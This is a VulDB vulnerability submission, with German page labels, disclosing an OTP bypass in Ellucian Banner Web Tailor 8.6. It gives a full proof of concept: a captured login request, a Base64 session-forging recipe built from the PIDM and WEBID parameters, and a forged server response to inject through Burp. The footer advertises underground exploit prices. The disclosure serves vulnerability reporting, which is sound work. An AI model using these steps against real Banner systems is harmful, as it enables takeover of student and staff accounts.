Submit #105548: OTP Bypass code at Ellucian banner web tailor 8.6info

TitelOTP Bypass code at Ellucian banner web tailor 8.6
Beschreibung ## INTRO Bypass OTP in OTP page in Ellucian banner web tailor 8.6 allows Attacker to Bypass OTP code via OTP page. The service is vulnerable is `Ellucian banner web tailor 8.6` The location that has the vulnerable is `OTP page` ## Summary When you access the `Login page` and have you done writing your credentials You will direct to the `OTP page` here we can manipulate the response to bypass the validation request for the OTP the vulnerability will be on the `OTP request page`. >The technique that we use for Bypass is `response manipulation` ## PoC First of all, we just need to put in the right credentials then it will redirect ur to `The OTP page` Second, Put any random number in the OTP input the request will be like this: ``` POST /PROD_ar/twbkwbis.P_FirstMenu HTTP/1.1 Host: 127.0.0.1:7710 Cookie: <Some-C00kies>....... Content-Length: 139 Cache-Control: max-age=0 Sec-Ch-Ua: "Google Chrome";v="111", "Not(A:Brand";v="8", "Chromium";v="111" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 Origin: https://127.0.0.1:7710 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://127.0.0.1:7710/PROD_ar/twbkwbis.P_ValLogin Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close PIDM=1234724&WEBID=PGCO8W&RET_CODE=&VerC=1212&usage_btn=Submit&usage_btn=Submit ``` Now we just need to focus on two parameters in the POST request, they are: ``` PIDM=1234724&WEBID=PGCO8W because with these two values, we can generate new sessions for us To use it in the response manipulation technique ``` > Note the sessions in the server they encode it with base64 hash Take the two values and generate a new session: ``` PIDM=1234724&WEBID=PGCO8W Split: PGCO8W 1234724 Then make it in one line: PGCO8W1234724 Encode it "Base64": UEdDTzhXMTIzNDcyNA== ``` ### Steps to do the attack 1- Do "Do intercept" in Proxt-Intercept at "Burp suite" to capture the response<br> 2- Then, replace all the responses with this request "Valid request that takes it from valid access": ``` HTTP/1.1 200 OK Date: Fri, 24 Mar 2023 20:46:27 GMT Content-Length: 316 Set-Cookie: SESSID=UEdDTzhXMTIzNDcyNA== Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en Strict-Transport-Security: max-age=16070400; includeSubDomains Set-Cookie: <Some-C00kies>....... <HTML> <HEAD> <meta http-equiv="refresh" content="0;url=/PROD_ar/twbkwbis.P_GenMenu?name=bmenu.P_MainMnu&amp;msg=WELCOME!"> </HEAD> </HTML> ``` > in the header "Set-Cookie: SESSID=`the session we generate`" Finally, it will redirect you to the Dashboard. ## Impact An attacker can bypass the OTP code when they try to exploit the account.
Benutzer
 Naif (UID 43704)
Einreichung24.03.2023 23:36 (vor 3 Jahren)
Moderieren25.03.2023 17:05 (17 hours later)
StatusAkzeptiert
VulDB Eintrag224014 [Ellucian Banner Web Tailor 8.6 Login Page twbkwbis.P_FirstMenu PIDM/WEBID erweiterte Rechte]
Punkte17

ZurückÜbersichtWeiter

Interested in the pricing of exploits?

See the underground prices here!